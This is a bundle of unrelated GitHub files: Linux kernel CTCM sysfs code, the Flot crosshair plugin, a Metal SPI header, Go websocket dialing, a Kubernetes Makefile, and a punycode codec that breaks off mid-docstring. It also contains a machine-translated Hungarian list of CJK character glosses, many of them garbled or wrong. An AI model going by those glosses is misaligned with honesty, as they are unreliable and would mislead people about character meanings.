return -ENODEV;
return sprintf(buf, "%d\n", priv->buffer_size);
}
/*
 * sysfs 'buffer' store: parse and apply a new channel buffer size.
 * Rejects values above CTCM_BUFSIZE_LIMIT or too small for the minimum
 * MTU (576) plus the link-level header; when the interface is down, the
 * MTU is adjusted to match the new buffer size.
 */
static ssize_t ctcm_buffer_write(struct device *dev,
		struct device_attribute *attr, const char *buf, size_t count)
{
	struct net_device *ndev;
	unsigned int bs1;
	struct ctcm_priv *priv = dev_get_drvdata(dev);
	int rc;

	/*
	 * Fix: validate priv/channel/netdev BEFORE dereferencing them.
	 * The original assigned ndev = priv->channel[CTCM_READ]->netdev
	 * ahead of this check, crashing when drvdata is not (yet) set.
	 */
	if (!(priv && priv->channel[CTCM_READ] &&
	      priv->channel[CTCM_READ]->netdev)) {
		CTCM_DBF_TEXT(SETUP, CTC_DBF_ERROR, "bfnondev");
		return -ENODEV;
	}
	ndev = priv->channel[CTCM_READ]->netdev;

	rc = sscanf(buf, "%u", &bs1);
	if (rc != 1)
		goto einval;
	if (bs1 > CTCM_BUFSIZE_LIMIT)
		goto einval;
	if (bs1 < (576 + LL_HEADER_LENGTH + 2))
		goto einval;
	priv->buffer_size = bs1;	/* just to overwrite the default */

	/* A running interface must keep room for its current MTU. */
	if ((ndev->flags & IFF_RUNNING) &&
	    (bs1 < (ndev->mtu + LL_HEADER_LENGTH + 2)))
		goto einval;

	priv->channel[CTCM_READ]->max_bufsize = bs1;
	priv->channel[CTCM_WRITE]->max_bufsize = bs1;
	if (!(ndev->flags & IFF_RUNNING))
		ndev->mtu = bs1 - LL_HEADER_LENGTH - 2;
	priv->channel[CTCM_READ]->flags |= CHANNEL_FLAGS_BUFSIZE_CHANGED;
	priv->channel[CTCM_WRITE]->flags |= CHANNEL_FLAGS_BUFSIZE_CHANGED;

	CTCM_DBF_DEV(SETUP, ndev, buf);
	return count;

einval:
	CTCM_DBF_DEV(SETUP, ndev, "buff_err");
	return -EINVAL;
}
/*
 * Dump device/channel FSM states and TX statistics to the kernel log.
 * Fix: use CTCM_WRITE consistently for the write-channel index; the
 * original mixed it with the generic WRITE macro from <linux/fs.h>,
 * which only works by coincidence of values.
 */
static void ctcm_print_statistics(struct ctcm_priv *priv)
{
	char *sbuf;
	char *p;

	if (!priv)
		return;
	sbuf = kmalloc(2048, GFP_KERNEL);
	if (sbuf == NULL)
		return;
	p = sbuf;

	p += sprintf(p, "  Device FSM state: %s\n",
		     fsm_getstate_str(priv->fsm));
	p += sprintf(p, "  RX channel FSM state: %s\n",
		     fsm_getstate_str(priv->channel[CTCM_READ]->fsm));
	p += sprintf(p, "  TX channel FSM state: %s\n",
		     fsm_getstate_str(priv->channel[CTCM_WRITE]->fsm));
	p += sprintf(p, "  Max. TX buffer used: %ld\n",
		     priv->channel[CTCM_WRITE]->prof.maxmulti);
	p += sprintf(p, "  Max. chained SKBs: %ld\n",
		     priv->channel[CTCM_WRITE]->prof.maxcqueue);
	p += sprintf(p, "  TX single write ops: %ld\n",
		     priv->channel[CTCM_WRITE]->prof.doios_single);
	p += sprintf(p, "  TX multi write ops: %ld\n",
		     priv->channel[CTCM_WRITE]->prof.doios_multi);
	p += sprintf(p, "  Netto bytes written: %ld\n",
		     priv->channel[CTCM_WRITE]->prof.txlen);
	p += sprintf(p, "  Max. TX IO-time: %ld\n",
		     priv->channel[CTCM_WRITE]->prof.tx_time);

	printk(KERN_INFO "Statistics for %s:\n%s",
	       priv->channel[CTCM_WRITE]->netdev->name, sbuf);
	kfree(sbuf);
	return;
}
/* sysfs 'stats' read: dump statistics to the kernel log, return "0". */
static ssize_t stats_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct ccwgroup_device *gdev = to_ccwgroupdev(dev);
struct ctcm_priv *priv = dev_get_drvdata(dev);

/* Statistics are only meaningful for an online group device. */
if (!priv || gdev->state != CCWGROUP_ONLINE)
return -ENODEV;
ctcm_print_statistics(priv);
return sprintf(buf, "0\n");
}
/*
 * sysfs 'stats' store: any write resets the TX statistics.
 * Fix: index with CTCM_WRITE consistently; the original mixed the
 * generic WRITE macro (memset target) with CTCM_WRITE (sizeof).
 */
static ssize_t stats_write(struct device *dev, struct device_attribute *attr,
			const char *buf, size_t count)
{
	struct ctcm_priv *priv = dev_get_drvdata(dev);

	if (!priv)
		return -ENODEV;
	/* Reset statistics */
	memset(&priv->channel[CTCM_WRITE]->prof, 0,
	       sizeof(priv->channel[CTCM_WRITE]->prof));
	return count;
}
/* sysfs 'protocol' read: report the configured CTCM protocol number. */
static ssize_t ctcm_proto_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct ctcm_priv *priv = dev_get_drvdata(dev);
if (!priv)
return -ENODEV;

return sprintf(buf, "%d\n", priv->protocol);
}
/* sysfs 'protocol' store: select one of the supported CTCM protocols. */
static ssize_t ctcm_proto_store(struct device *dev,
		struct device_attribute *attr, const char *buf, size_t count)
{
	struct ctcm_priv *priv = dev_get_drvdata(dev);
	int value;

	if (!priv)
		return -ENODEV;
	if (sscanf(buf, "%d", &value) != 1)
		return -EINVAL;
	/* Only the four known protocol identifiers are accepted. */
	switch (value) {
	case CTCM_PROTO_S390:
	case CTCM_PROTO_LINUX:
	case CTCM_PROTO_MPC:
	case CTCM_PROTO_OS390:
		break;
	default:
		return -EINVAL;
	}
	priv->protocol = value;
	CTCM_DBF_DEV(SETUP, dev, buf);

	return count;
}
/* Human-readable channel-type names, indexed by cdev driver_info. */
static const char *ctcm_type[] = {
"not a channel",
"CTC/A",
"FICON channel",
"ESCON channel",
"unknown channel type",
"unsupported channel type",
};
/* sysfs 'type' read: translate driver_info into a channel-type name. */
static ssize_t ctcm_type_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct ccwgroup_device *cgdev;

cgdev = to_ccwgroupdev(dev);
if (!cgdev)
return -ENODEV;

/* NOTE(review): driver_info is used unchecked as an index into
 * ctcm_type[] -- presumably bounded by the ccw driver's id table;
 * confirm. */
return sprintf(buf, "%s\n",
ctcm_type[cgdev->cdev[0]->id.driver_info]);
}
/* Attribute declarations wiring the show/store handlers above. */
static DEVICE_ATTR(buffer, 0644, ctcm_buffer_show, ctcm_buffer_write);
static DEVICE_ATTR(protocol, 0644, ctcm_proto_show, ctcm_proto_store);
static DEVICE_ATTR(type, 0444, ctcm_type_show, NULL);
static DEVICE_ATTR(stats, 0644, stats_show, stats_write);

static struct attribute *ctcm_attr[] = {
&dev_attr_protocol.attr,
&dev_attr_type.attr,
&dev_attr_buffer.attr,
&dev_attr_stats.attr,
NULL,
};

static struct attribute_group ctcm_attr_group = {
.attrs = ctcm_attr,
};

/* Exported group list registered with the ccwgroup device. */
const struct attribute_group *ctcm_attr_groups[] = {
&ctcm_attr_group,
NULL,
};
|
{
"pile_set_name": "Github"
}
|
/* Flot plugin for showing crosshairs when the mouse hovers over the plot.
Copyright (c) 2007-2013 IOLA and Ole Laursen.
Licensed under the MIT license.
The plugin supports these options:
crosshair: {
mode: null or "x" or "y" or "xy"
color: color
lineWidth: number
}
Set the mode to one of "x", "y" or "xy". The "x" mode enables a vertical
crosshair that lets you trace the values on the x axis, "y" enables a
horizontal crosshair and "xy" enables them both. "color" is the color of the
crosshair (default is "rgba(170, 0, 0, 0.80)"), "lineWidth" is the width of
the drawn lines (default is 1).
The plugin also adds four public methods:
- setCrosshair( pos )
Set the position of the crosshair. Note that this is cleared if the user
moves the mouse. "pos" is in coordinates of the plot and should be on the
form { x: xpos, y: ypos } (you can use x2/x3/... if you're using multiple
axes), which is coincidentally the same format as what you get from a
"plothover" event. If "pos" is null, the crosshair is cleared.
- clearCrosshair()
Clear the crosshair.
- lockCrosshair(pos)
Cause the crosshair to lock to the current location, no longer updating if
the user moves the mouse. Optionally supply a position (passed on to
setCrosshair()) to move it to.
Example usage:
var myFlot = $.plot( $("#graph"), ..., { crosshair: { mode: "x" } } };
$("#graph").bind( "plothover", function ( evt, position, item ) {
if ( item ) {
// Lock the crosshair to the data point being hovered
myFlot.lockCrosshair({
x: item.datapoint[ 0 ],
y: item.datapoint[ 1 ]
});
} else {
// Return normal crosshair operation
myFlot.unlockCrosshair();
}
});
- unlockCrosshair()
Free the crosshair to move again after locking it.
*/
(function ($) {
var options = {
crosshair: {
mode: null, // one of null, "x", "y" or "xy",
color: "rgba(170, 0, 0, 0.80)",
lineWidth: 1
}
};
function init(plot) {
    // Crosshair position in canvas (pixel) coordinates relative to the
    // plot area; x == -1 means "hidden". "locked" freezes the crosshair
    // so mouse movement no longer updates it.
    var crosshair = { x: -1, y: -1, locked: false };

    // Public API: move the crosshair to pos (a point in data-space
    // coordinates). A falsy pos hides the crosshair.
    plot.setCrosshair = function setCrosshair(pos) {
        if (!pos)
            crosshair.x = -1;
        else {
            // Convert data coordinates to canvas coordinates and clamp
            // to the visible plot area.
            var o = plot.p2c(pos);
            crosshair.x = Math.max(0, Math.min(o.left, plot.width()));
            crosshair.y = Math.max(0, Math.min(o.top, plot.height()));
        }

        plot.triggerRedrawOverlay();
    };

    plot.clearCrosshair = plot.setCrosshair; // passes null for pos

    // Public API: optionally move the crosshair, then freeze it in place.
    plot.lockCrosshair = function lockCrosshair(pos) {
        if (pos)
            plot.setCrosshair(pos);
        crosshair.locked = true;
    };

    // Public API: let the crosshair follow the mouse again.
    plot.unlockCrosshair = function unlockCrosshair() {
        crosshair.locked = false;
    };

    // Hide the crosshair when the pointer leaves the plot (unless locked).
    // Named function (not inline) so shutdown can unbind this exact handler.
    function onMouseOut(e) {
        if (crosshair.locked)
            return;

        if (crosshair.x != -1) {
            crosshair.x = -1;
            plot.triggerRedrawOverlay();
        }
    }

    // Track the mouse with the crosshair, clamped to the plot area.
    function onMouseMove(e) {
        if (crosshair.locked)
            return;

        // If the selection plugin is active and a selection is in
        // progress, suppress the crosshair to avoid visual clutter.
        if (plot.getSelection && plot.getSelection()) {
            crosshair.x = -1; // hide the crosshair while selecting
            return;
        }

        var offset = plot.offset();
        crosshair.x = Math.max(0, Math.min(e.pageX - offset.left, plot.width()));
        crosshair.y = Math.max(0, Math.min(e.pageY - offset.top, plot.height()));
        plot.triggerRedrawOverlay();
    }

    // Only listen for mouse events when a crosshair mode is configured.
    plot.hooks.bindEvents.push(function (plot, eventHolder) {
        if (!plot.getOptions().crosshair.mode)
            return;

        eventHolder.mouseout(onMouseOut);
        eventHolder.mousemove(onMouseMove);
    });

    // Draw the crosshair on the overlay canvas on each overlay redraw.
    plot.hooks.drawOverlay.push(function (plot, ctx) {
        var c = plot.getOptions().crosshair;
        if (!c.mode)
            return;

        var plotOffset = plot.getPlotOffset();

        ctx.save();
        ctx.translate(plotOffset.left, plotOffset.top);

        if (crosshair.x != -1) {
            // Half-pixel offset for odd line widths so the stroke lands
            // on the pixel grid (canvas strokes are centered on the path).
            var adj = plot.getOptions().crosshair.lineWidth % 2 === 0 ? 0 : 0.5;

            ctx.strokeStyle = c.color;
            ctx.lineWidth = c.lineWidth;
            ctx.lineJoin = "round";

            ctx.beginPath();
            if (c.mode.indexOf("x") != -1) {
                // Vertical line at the crosshair's x position.
                var drawX = Math.round(crosshair.x) + adj;
                ctx.moveTo(drawX, 0);
                ctx.lineTo(drawX, plot.height());
            }
            if (c.mode.indexOf("y") != -1) {
                // Horizontal line at the crosshair's y position.
                var drawY = Math.round(crosshair.y) + adj;
                ctx.moveTo(0, drawY);
                ctx.lineTo(plot.width(), drawY);
            }
            ctx.stroke();
        }
        ctx.restore();
    });

    // Unbind the exact handler references registered above.
    plot.hooks.shutdown.push(function (plot, eventHolder) {
        eventHolder.unbind("mouseout", onMouseOut);
        eventHolder.unbind("mousemove", onMouseMove);
    });
}
// Register the crosshair plugin with flot.
$.plot.plugins.push({
    init: init,
    options: options,
    name: 'crosshair',
    version: '1.0'
});
})(jQuery);
|
{
"pile_set_name": "Github"
}
|
/* Generated by RuntimeBrowser.
 */

// Private (SPI) extension of MTLDepthStencilState exposing whether the
// configured state reads from / writes to the depth and stencil buffers.
@protocol MTLDepthStencilStateSPI <MTLDepthStencilState>

@required

- (bool)readsDepth;    // true if the state samples the depth buffer
- (bool)readsStencil;  // true if the state samples the stencil buffer
- (bool)writesDepth;   // true if the state updates the depth buffer
- (bool)writesStencil; // true if the state updates the stencil buffer

@end
|
{
"pile_set_name": "Github"
}
|
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package websocket
import (
"crypto/tls"
"net"
)
// dialWithDialer opens the underlying network connection for a WebSocket
// handshake using the supplied dialer. A "ws" URL gets a plain TCP
// connection, a "wss" URL gets a TLS-wrapped one configured from
// config.TlsConfig, and any other scheme yields ErrBadScheme.
func dialWithDialer(dialer *net.Dialer, config *Config) (conn net.Conn, err error) {
	scheme := config.Location.Scheme
	if scheme == "ws" {
		conn, err = dialer.Dial("tcp", parseAuthority(config.Location))
	} else if scheme == "wss" {
		conn, err = tls.DialWithDialer(dialer, "tcp", parseAuthority(config.Location), config.TlsConfig)
	} else {
		err = ErrBadScheme
	}
	return conn, err
}
|
{
"pile_set_name": "Github"
}
|
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Image version tag and container registry prefix for the volume-gluster image.
TAG = 0.4
PREFIX = gcr.io/google_containers

# Default target: build the image and push both tags.
all: push

container: image

image:
	docker build --pull -t $(PREFIX)/volume-gluster . # Build new image and automatically tag it as latest
	docker tag $(PREFIX)/volume-gluster $(PREFIX)/volume-gluster:$(TAG) # Add the version tag to the latest image

push: image
	gcloud docker -- push $(PREFIX)/volume-gluster # Push image tagged as latest to repository
	gcloud docker -- push $(PREFIX)/volume-gluster:$(TAG) # Push version tagged image to repository (since this image is already pushed it will simply create or update version tag)

# clean has no recipe here; nothing is produced locally besides docker images.
clean:
|
{
"pile_set_name": "Github"
}
|
# Module version number (stub module; package declaration precedes this chunk).
$VERSION = 0.01;
1; # a module must end by returning a true value
|
{
"pile_set_name": "Github"
}
|
8800:
8801: Ideográf lárvák, CJK grubok : hoeng2 : xiǎng
8802:
8803: Ideográf a CJK egyedülálló darázs : lo2 lo4 : luǒ
8804: Ideográf (Cant.) 蠄 蟧, egy pók;蠄 蟝, egy varangy CJK : kam4 : Qin
8805: Ideográf repül CJK-val : jing4 : Ying
8806: Ideográf egyfajta skorpió; a farok CJK-jában : caai3 : chai
8807:
8808:
8809: Ideograph szúnyog lárvák, cigányok CJK : hyun1 : Xuan
880A:
880B: Ideograph caterpillar CJK : zuk1 : Zhu
880C:
880D: Ideograph scorpion CJK : hit3 kit3 : Xie
880E: Ideográf python, boa constrictor CJK : mǎng
880F: Ideográf rák, brachyura CJK : haai5 : Xie
8810: Ideográfiás gubók, CJK-k : cai4 : Qi
8811: Ideográf gyík CJK : wing4 : Rong
8812:
8813: Ideográf kanyarok; sandflies CJK : mung5 : Meng
8814: Ideográf osztriga CJK : hou4 : Hao
8815: Ideograph eumenes polifomis, fajta darázs CJK : jyu4 : ru
8816: Ideográf hüvely-féreg; looper caterpiller CJK : wok6 : Huo
8817:
8818:
8819: Ideográf osztriga CJK : ban1 pan4 : tű
881A:
881B: Ideográf legyek, nedves helyen előállított kis rovarok CJK : mit6 : Mie
881C: Ideograph szöcske CJK : faan4 : ventilátor
881D:
881E:
881F: Ideográf viasz; gyertya; viaszos, mázas CJK : laap6 : là
8820:
8821: Ideográf fafúró rovar; a fa CJK-ba került : lai5 : Lí
8822: Ideográfiás rángatózás; hülye; bolondos; zsír CJK : ceon2 : chǔn
8823: Ideográf osztriga CJK : lai6 : Li
8824:
8825:
8826:
8827: Ideográf moly; rovarok, amelyek CJK ruhát fogyasztanak : dou3 dou6 : du
8828: Ideográf egyfajta pók, hosszú lábakkal CJK : siu1 : Xiao
8829: Ideograph egy varangy CJK : Zhu
882A:
882B:
882C:
882D: Ideográf méhek, hornetok, darazsak CJK : fung1 : Feng
882E: Ideográf méh CJK : jit6 : te
882F:
8830:
8831: Ideográf méreg; méreg; sérelem; CJK : GU2 : gǔ
8832: Ideograph a millipede, akit néha megzavartak a növekedés féreggel; világos, tiszta CJK : gyun1 : Juan
8833:
8834:
8835: Ideograph nagy teknősök CJK : kwai4 : Xi
8836: Ideográfiai selyemhernyók CJK : caam4 : tud
8837:
8838:
8839: Ideográf moly; rovarok, amelyek a CJK-ban alvadnak : dou3 : du
883A: Ideográf ugyanaz, mint 蚕 U + 8695 selyemhernyók CJK : tud
883B: Ideográf barbárok; barbár, vad CJK : maan4 : Férfi
883C:
883D:
883E:
883F:
8840: Ideográf vér; 143 CJK csoport : hyut3 : Xue
8841: Ideográf vér CJK : fong1 : Huang
8842: Az Ideográf legyőzése CJK : luk6 nuk6 : nǜ
8843:
8844: Ideograph epistaxis, orrvérzés; legyőzni CJK-t : nuk6 : nǜ
8845: Az ideográfia az áldozati edényeket a vér elkenődésével szenteli; szakadjon CJK-t : jan3 : Xin
8846: Ideograph sokaság, tömeg; tömegek, nyilvános CJK : zung3 : Zhong
8847: Ideográf véredények, vénák, artériák CJK : mak6 : Mai
8848: Ideograph az áldozati tyúk vérét, amelyet az ajtókon és a hajókon megszórjuk CJK : ji6 nei6 : ÈR
8849: Ideograph, hogy hány CJK : kā
884A: Ideográf kenet, rágalom; defilálja CJK-t : mit6 : Mie
884B:
884C: Ideograph megy; séta; mozgás, utazás; CJK-t forgalmaz : haang4 hang4 hang6 hong4 : Xing
884D: Az Ideograph túlcsordulás, a kiömlés, a CJK kiszórása : hin2 jin2 jin5 : yǎn
884E: Ideográf, hogy örömet adjon; elégedett, boldog CJK : hon2 hon3 : Kàn
884F:
8850:
8851:
8852: Ideográf brag; mutogasson, támogassa CJK-t : jyun6 : Xuan
8853: Ideográf művészet, készség, különleges műsor; módszer, technika CJK : seot6 : Shu
8854: Ideográf bit; tartsd szájban, harapj; CJK : haam4 : Xián
8855: Ideograph alley, CJK sáv : dung6 tung4 : tong
8856: Ideográf sáv; CJK sikátor : hong6 tüdő6 : Xiang
8857: Ideográf utca, út, út CJK : gaai1 : Jie
8858:
8859: Ideográf közhivatal; hivatalos tartózkodási hely CJK : ngaa4 : YA
885A: Ideográf sáv, sikátor, CJK mellékutca : wu4 : HU
885B: Ideográf védő, védi, védje CJK-t : wai6 : Wei
885C: Ideográf út, CJK út : Dao
885D: Ideograph rohanás ellen, CJK előre : cung1 cung3 : Chong
885E: Ideográf védő, védi, védje CJK-t : wai6 : Wei
885F:
8860:
8861: Ideográf mérés, mérlegelés, bíró, CJK : hang4 waang4 : Heng
8862: Ideográf autópálya; kereszteződés, CJK kereszteződés : keoi4 : qu
8863: Ideográf ruhák, ruházat; borítás, bőr CJK : ji1 ji3 : Yi
8864: Ideográf ruhák; 145 CJK csoport : Yi
8865: Ideograph javítás, javítás, javítás, helyreállítás, CJK helyreállítása : bou2 : bǔ
8866: Az Ideograph kiegyenlíti a ruhákat CJK : gǎn
8867:
8868: Ideograph show, express, manifest, CJK megjelenítése : biu2 : biǎo
8869: Ideográf a ruhadarab nyílt varrása, amely lehetővé teszi a mozgás szabadságát CJK : Caa3 : chǎ
886A:
886B: Ideográf póló; palást; ruhában; kabát CJK : saam1 : Shan
886C: Ideograph fehérnemű; belső ruhák CJK : can3 : Chen
886D: Ideográf a ruházat CJK hajtóka : fu1 fu3 : Fu
886E: CJK császár által viselt Ideograph ünnepi ruha : gwan2 : gǔn
886F:
8870: Ideográfiás csökkenés, elakadás, csökkenés; gyengíti CJK-t : ceoi1 seoi1 : Shuai
8871:
8872: Ideográf kijavít, varrni, tapaszt; vonal; paplan CJK : naap6 : na
8873:
8874:
8875: Ideográf hálószoba CJK : jat6 nik1 : Yi
8876:
8877: Ideográf szív, szívünk aljáról CJK : cung1 zung1 : Zhong
8878:
8879: Csak Ideográf, csak CJK : zi2 -vel : zhǐ
887A: Ideográfiás rés a CJK mozgását segítő ruhában : Xie
887B:
887C:
887D: Ideográf hajtóka; rejtett hajtóka a kabát CJK : jam5 jam6 : Ren
887E: Ideográf fedőlap, paplan CJK : kam1 : Qin
887F: Ideográf gallér vagy CJK ruhadarab : gam1 kam1 : Jin
8880:
8881: Ideográf-köntös; CJK vezetéknév : jyun4 : yuan
8882: Ideográf hüvelyek CJK : mai6 : Mei
8883:
8884: Ideográf külső ruházat; kabát, kabát CJK : OU2 : ǎo
8885: Ideográf felfelé görbül; gyengéden vándorolva CJK : niu5 : niǎo
8886: Egy királynő CJK Ideograph ünnepi ruhája : FAI1 : Hui
8887:
8888: Ideográf buddhista cassock CJK : gaa1 : Jia
8889:
888A:
888B: Ideográf zseb, táska, zsák, tasak CJK : doi6 : dai
888C:
888D: Ideográf hosszú ruha, köntös, köpeny CJK : pou4 : Pao
888E:
888F:
8890:
8891:
8892: Ideográf csík; leleplez vkit; csupasz; meztelen CJK : taan2 : tǎn
8893:
8894:
8895:
8896: Ideográf hüvely; tegyen valamit CJK-ba : zau6 : Xiu
8897: Ideográf nem szegélyezett ruházat; CJK ruhadarab : can2 zan2 : Zhen
8898:
8899:
889A: Ideográf zsír; térd védők; Buskins CJK : fai3 zsír1 : BO
889B:
889C: Ideograph zokni, harisnya CJK : mat6 : WA
889D:
889E: CJK császár által viselt Ideograph ünnepi ruha : gwan2 : gǔn
889F: Ideográf könyvborító; táska vagy táska CJK : dit6 : Zhi
88A0: Ideográf könyvborító; táska vagy táska CJK : dit6 : Zhi
88A1:
88A2: Ideográf köpeny CJK : paan3 : Pán
88A3:
88A4: Ideográf hosszúság, hosszirányban; hossza CJK : mau6 : Mao
88A5:
88A6:
88A7:
88A8:
88A9:
88AA: Ideográf hüvelyek; mandzsetta CJK : keoi1 : qu
88AB: „Ideograph” passzív indikátor; ágynemű CJK : bei6 pei1 pei5 : bei
88AC:
88AD: Ideográf raid, támadás; örökölje CJK-t : zaap6 : Xi
88AE: Az U + 4F60 你 szinonimaként használt Ideográf, amikor az istenség CJK-ra utal : nei5 ji5 : mí
88AF: Ideograph esőkabát CJK : but6 : bó
88B0:
88B1: Ideográf egy használt ruhadarab csomagolás CJK : fuk6 : Fu
88B2:
88B3: Az Ideograph a ruháit CJK-ra terítette : chǐ
88B4: Ideográf nadrág; nadrág; CJK bugyi : fu3 : ku
88B5: Ideográf hajtóka; rejtett hajtóka a kabát CJK : jam4 : Ren
88B6:
88B7: Ideograph bélelt ruha CJK : gaap3 : Jia
88B8:
88B9:
88BA: Az Ideograph felemeli a CJK-t : git3 : Jie
88BB:
88BC:
88BD: Ideográf ruhák CJK : jyu4 : ru
88BE:
88BF: Ideográf ruha CJK : gwai1 : Gui
88C0: Ideográf szőnyeg, takaró; fehérnemű CJK : jan1 : Yin
88C1: Ideográf kivágása; csökken CJK : coi4 : CAI
88C2: Ideográf osztás, repedés, szakadás; rend CJK : lit6 : hazugság
88C3: Ideográf régi szertartás; samurai garb CJK : kǎ
88C4: Ideográf hüvely hossza CJK : xing
88C5: Ideográf ruha, ruházat, öltözék; töltse ki a CJK-t : zong1 : Zhuang
88C6: Ideográfiás nyakörv vagy nadrág ülés; CJK : dong1 : Dang
88C7: Ideograph (Cant.) Ing (Engel. Hitel) CJK : seot1 : Xu
88C8: Ideograph nadrágok, nadrágok, nadrágok, fiókok CJK : gwan1 : Kun
88C9: Ideográf varrás ruhában CJK : kang3 : Ken
88CA: Ideográf felfelé görbül; gyengéden vándorolva CJK : niu5 : niǎo
88CB: CJK fiúszolgálat Ideograph pamut ruhája : syu6 : Shu
88CC: Ideograph bélelt ruha CJK : gaap3 : Jia
88CD: Ideográf egy szegély vagy zenekar a ruha szélén CJK : kǔn
88CE: Ideográf, hogy vegye le a ruhákat és tegye ki a testet. CJK-ban hordoz : cing4 : Cheng
88CF: Ideográf belül, belső, belül CJK : lei5 leoi5 : lǐ
88D0:
88D1:
88D2: Ideográf összegyűjti, összegyűjti, összeszed; dicséret CJK : fau4 pau4 : Pou
88D3:
88D4: Ideográf utódok, utódok, utódok CJK : jeoi6 : Yi
88D5: Ideograph bőséges, gazdag, bőséges CJK : jyu6 : yu
88D6:
88D7:
88D8: Ideográfiai prémes ruhák; CJK vezetéknév : kau4 : Qiu
88D9: Ideográf szoknya, kötény, petticoat CJK : kwan4 : Qun
88DA:
88DB: Ideográf a kötéshez és kötéshez; nyirkos; CJK könyveszsák : jap1 : Yi
88DC: Ideograph javítás, javítás, javítás, helyreállítás, CJK helyreállítása : bou2 : bǔ
88DD: Ideográf ruha, ruha; díszít; töltse ki a CJK-t : zong1 : Zhuang
88DE:
88DF: Ideograph egy szerzetes vagy köpeny egy szerzetes CJK : SAA1 : SHA
88E0: Ideográf egy rövid szoknya CJK : Qun
88E1: Ideográf belül, belső, belül CJK : lei5 leoi5 : lǐ
88E2: Ideográf összecsukható pénztárcája a CJK övbe : lin4 : Lian
88E3: Az Ideograph a CJK hüvelyébe húzza a kezét : lim6 : liǎn
88E4: Ideográf nadrág, nadrág CJK : fu3 : ku
88E5: Ideográf hajtások CJK : jiǎn
88E6:
88E7:
88E8: Ideográf támogatás, javak, segítség; kiegészítő CJK : bei1 pei4 : kettős
88E9:
88EA: Ideograph a hüvely CJK : Tao
88EB:
88EC:
88ED:
88EE:
88EF: Ideográf fedőlap; ágytakaró CJK : cau4 : Chou
88F0: Ideograph a ruhák CJK javítására : zyut3 : duó
88F1: Ideográf a térképek vagy görgetések beillesztéséhez a CJK beillesztéséhez : biu2 : biǎo
88F2: Ideográf mellény CJK : loeng5 : liǎng
88F3: Ideográf ruhák; szoknya; gyönyörű CJK : soeng4 : Shang
88F4: Ideográf vezetéknév; egy áramló ruha CJK : pui4 : Pei
88F5: Ideográf vezetéknév; egy áramló ruha CJK : pui4 : Pei
88F6:
88F7:
88F8: Ideográf csupasz, meztelen; levetkőzni, csík CJK : lo2 : luǒ
88F9: Ideográf burkolás, kötés; körülveszi a CJK-t : gwo2 : guǒ
88FA:
88FB:
88FC: Ideográf, hogy vegye le a tetejét; eladja a CJK-t : sik3 tik1 : Ti
88FD: Ideográf gyártás, gyártás; gyárt CJK-t : zai3 : Zhi
88FE: Ideográf hajtóka, ruházati szegély; szoknya CJK : geoi1 : Ju
88FF:
|
{
"pile_set_name": "Github"
}
|
# -*- coding: iso-8859-1 -*-
""" Codec for the Punicode encoding, as specified in RFC 3492
Written by Martin v. Löwis.
"""
import codecs
##################### Encoding #####################################
def segregate(str):
    """3.1 Basic code point segregation

    Split *str* into its ASCII ("basic") code points and the distinct
    non-ASCII ("extended") code points.

    Returns a tuple (base, extended): base is the basic portion encoded
    as ASCII, extended is a sorted list of the unique non-ASCII
    characters of *str*.
    """
    base = []
    extended = set()  # only distinct extended code points matter
    for c in str:
        if ord(c) < 128:
            base.append(c)
        else:
            extended.add(c)
    # sorted() works on both Python 2 and 3; the original
    # `extended.keys()` followed by `.sort()` relies on keys() returning
    # a list, which is no longer true on Python 3.
    extended = sorted(extended)
    return "".join(base).encode("ascii"),extended
def selective_len(str, max):
    """Return the length of str, considering only characters below max."""
    return sum(1 for c in str if ord(c) < max)
def selective_find(str, char, index, pos):
"""Return a pair (index, pos), indicating the next occurrence of
char in str. index is the position of the character considering
only ordinals up to and including char, and pos is the position in
the full string. index/pos is the starting position in the full
string."""
l = len(str)
while 1:
pos += 1
if pos == l:
return (-1, -1)
c = str[pos]
if c == char:
return index+1, pos
elif c < char:
index += 1
def insertion_unsort(str, extended):
    """3.2 Insertion unsort coding

    Compute the list of deltas the punycode decoder needs to re-insert
    the extended characters into the basic string.  For each extended
    character (visited in sorted order), every occurrence in *str* is
    found and the distance from the previous insertion state is
    recorded, minus one as required by the encoding.
    """
    oldchar = 0x80
    result = []
    oldindex = -1
    for c in extended:
        index = pos = -1
        char = ord(c)
        # Insertion slots available: characters of str strictly below
        # the current code point, plus one.
        curlen = selective_len(str, char)
        # Jumping to the next (higher) code point costs one full pass
        # over the current insertion space per code-point step.
        delta = (curlen+1) * (char - oldchar)
        while 1:
            index,pos = selective_find(str,c,index,pos)
            if index == -1:
                break
            # Distance from the previous insertion point, biased by -1.
            delta += index - oldindex
            result.append(delta-1)
            oldindex = index
            delta = 0
        oldchar = char

    return result
def T(j, bias):
    """Threshold function for punycode digit j under the given bias.

    Punycode parameters: tmin = 1, tmax = 26, base = 36; the raw value
    36 * (j + 1) - bias is clamped into [tmin, tmax].
    """
    return min(26, max(1, 36 * (j + 1) - bias))
digits = "abcdefghijklmnopqrstuvwxyz0123456789"

def generate_generalized_integer(N, bias):
    """3.3 Generalized variable-length integers

    Encode the non-negative delta N as a punycode variable-length
    integer under the given bias; returns the digits as a list of
    characters (least significant first).
    """
    encoded = []
    position = 0
    while True:
        threshold = T(position, bias)
        if N < threshold:
            # Final digit: strictly below the threshold terminates.
            encoded.append(digits[N])
            return encoded
        encoded.append(digits[threshold + ((N - threshold) % (36 - threshold))])
        N = (N - threshold) // (36 - threshold)
        position += 1
def adapt(delta, first, numchars):
    """Bias adaptation (RFC 3492 section 3.4).

    Scale the last delta (damped more heavily on the very first one),
    then derive the new bias. Punycode parameters: damp = 700,
    skew = 38, base = 36, tmin = 1, tmax = 26.
    """
    delta //= 700 if first else 2
    delta += delta // numchars
    divisions = 0
    # ((base - tmin) * tmax) // 2 == 455
    while delta > 455:
        delta //= 35  # base - tmin
        divisions += 36
    return divisions + (36 * delta // (delta + 38))
def generate_integers(baselen, deltas):
    """Encode all deltas as generalized integers, adapting the bias
    after each one; returns the concatenated digit string.

